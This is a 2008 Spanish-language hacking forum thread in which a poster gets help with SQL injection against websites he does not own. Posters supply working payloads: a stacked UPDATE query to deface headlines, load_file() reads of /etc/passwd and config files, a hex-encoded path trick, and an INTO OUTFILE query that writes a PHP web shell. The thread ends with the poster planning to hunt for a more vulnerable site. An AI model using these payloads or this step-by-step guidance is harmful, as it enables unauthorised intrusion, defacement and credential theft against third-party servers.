Sql injection! Ayuda con esto!

[{O_o}] · 5 Diciembre 2008, 17:18 PM

http://victima.com/noticias.php?id=1;update noticias set
titular=concat(char(0x4c),char(0x69),char(0x63),char(0x65),char(0x79),char(0x20),char(0x43),
char(0x61),char(0x6d),char(0x70),char(0x65),char(0x6f),char(0x6e)) where id_noticia= 131/*

este es el query

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';update noticias settitular=concat(char(0x4c),char(0x69),char(0

este es el error lo que no entiendo es por que no corre

Azielito · 5 Diciembre 2008, 21:17 PM

Hasta donde yo recuerdo no podes hacer ;otrasentencia en sqlinjection =\ tal vez por eso te da el error ñ_ñ

Lo que podrias hacer es sacar info del server, y luego conectarte via remota (si es posible) o meter una shell (tambien si es posible) o sacar los datos del login de administracion del sistema =\

ChElAnO · 6 Diciembre 2008, 00:31 AM

hola,

no creo que puedas lograr eso. Lo primero seria sacar datos de la base de datos con UNION SELECT y ver analizando si hay una tabla de passwords. Ademas reconoce que sistema e intenta volcar los contenidos de ficheros importantes, tal vez config.php o /etc/passwd con la función load_file()

saludos,

[{O_o}] · 10 Diciembre 2008, 19:12 PM

Buen gracias por las respuesta! Estoy tratando de usera el load_file() para ver que pasa gracias.

http://www.victima.com/noticias.php?id=1%20union%20select%201,2,3,load_file(concat(char(0x22)%2bchar(0x69)%2bchar(0x6e)%2bchar(0x64)%2bchar(0x65)%2bchar(0x78)%2bchar(0x2e)%2bchar(0x70)%2bchar(0x68)%2bchar(0x70)%2bchar(0x22))),5,6,7%20from%20noticias/*

No me da error pero tampocomo me muesta los datos me puede explicar porue no muestra los datos!

Teddy Picker · 11 Diciembre 2008, 03:16 AM

Si, si eso esta bien... pero porque tienes que usar todos esos caracateres en concat??? $:-\$

Simplemente puedes juntar la notacion hexadecimal de cada caracter de "/etc/passwd"

Código [Seleccionar]

0x2f6574632f706173737764

Asi quedaria:

Código [Seleccionar]

load_file(0x2f6574632f706173737764)

ChElAnO · 11 Diciembre 2008, 05:32 AM

es posible que el usuario de myql que está ejecutra los scripts web no tenga los privilegios FILE para poder leer archivos. Intenta con union select user() para saber el usuario.

cuenta como vas,

saludos

[{O_o}] · 11 Diciembre 2008, 15:05 PM

gracias por la ayuda el usuario que genera es este estrella_dbuser@localhost pero de igual manera no me deja ver los archivos! no tiene permisos!

Pero tambien encontre otra web esta ves el user es root@localhost perfecto!
Ya puedo leer los archivos y todo pero no puedo crear un archivo usando INTO OUTFILE
creo que el problema esta en las comilla me puede alguien decir como se hace el INTO OUTFILE o un buen manual.

UNION SELECT 1,'<?php system($_GET['cmd']); ?>',3,4,5,6 INTO OUTFILE '/text.php'/*

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',3,4,5,6 INTO OUTFILE \'/text.php\'/*' at line 1

gracias por adelantado!

Azielito · 11 Diciembre 2008, 16:34 PM

es que tiene magic_quotes activado, y este si que no lo saltas, el "into dumpfile" y el "into outfile" siempre ocupa las comillas y sin este no funciona =\

mas abajo encontraras esa misma duda
foro.elhacker.net/bugs_y_exploits/como_hacer_into_outfile_si_tengo_magicquotes-t234737.0.html

y poco mas abajo encontraras otras formas de meter shell ñ_ñ

foro.elhacker.net/bugs_y_exploits/web_vulnerabilities_to_gain_access_to_the_system-t231238.0.html

y aun asi a veces no encuentro la forma de meter shell xDDD

[{O_o}] · 11 Diciembre 2008, 17:03 PM

Pues gracias Azielito y a los demas entonces tendre que buscar una web q tenga el magic quote off